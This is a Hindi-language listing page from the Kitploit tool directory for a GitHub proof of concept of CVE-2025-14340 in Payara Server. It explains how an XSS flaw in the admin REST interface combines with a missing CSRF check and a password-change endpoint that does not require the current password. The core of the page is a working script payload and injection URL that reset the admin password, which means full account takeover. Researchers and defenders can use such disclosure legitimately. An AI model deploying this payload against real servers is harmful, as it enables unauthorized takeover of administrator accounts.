Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/deepsecurityresearch/cve-2025-14340
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubdeepsecurityresearch/cve-2025-14340

CVE-2025-14340

CVE-2025-14340 के लिए PoC: Payara Server में एडमिन अकाउंट टेकओवर

रिपॉजिटरी देखें
1125 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

XSS से Admin अकाउंट टेकओवर (CVE-2025-14340)

Payara के Administration Rest Interface में एक Cross-Site Scripting कमजोरी है, जो हमलावर-नियंत्रित JavaScript के निष्पादन की अनुमति देती है और admin अकाउंट टेकओवर की ओर ले जाती है। इसके कारण:

  1. पैनल HTTP Basic Auth का उपयोग करता है (क्रेडेंशियल ब्राउज़र द्वारा same-origin अनुरोधों के लिए स्वचालित रूप से भेजे जाते हैं)।
  2. change-admin-password एंडपॉइंट को किसी उपयोगकर्ता का पासवर्ड अपडेट करने के लिए वर्तमान पासवर्ड की आवश्यकता नहीं होती है।
  3. change-admin-password फ़ॉर्म में CSRF सुरक्षा नहीं है।
  4. /management/domain/version में XSS का उपयोग करने वाला एक इंजेक्टेड स्क्रिप्ट /management/domain/change-admin-password पर POST कर सकता है और किसी भी लक्षित खाते के लिए हमलावर द्वारा चुना गया पासवर्ड सेट कर सकता है — जिसके परिणामस्वरूप administrator अकाउंट टेकओवर होता है।

प्रूफ ऑफ कॉन्सेप्ट

URL:

https://panel.example.com:4848/management/domain/version?<PAYLOAD>

PAYLOAD:

root@kitploit:~
<script>
fetch('/management/domain/change-admin-password', {
 method: 'POST',
 headers: {
 'X-Requested-By': 'GlassFish REST HTML interface',
 'Accept': 'text/html',
 'Content-Type': 'application/x-www-form-urlencoded'
 },
 body:
'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=chang
e-admin-password'
});
</script>

कानूनी

केवल अधिकृत उपयोग के लिए। DeepSecurity Perú अनधिकृत पहुंच का समर्थन नहीं करता है और प्रदान की गई जानकारी के किसी भी दुरुपयोग के लिए कोई ज़िम्मेदारी नहीं लेता है।

टूल डाउनलोड करें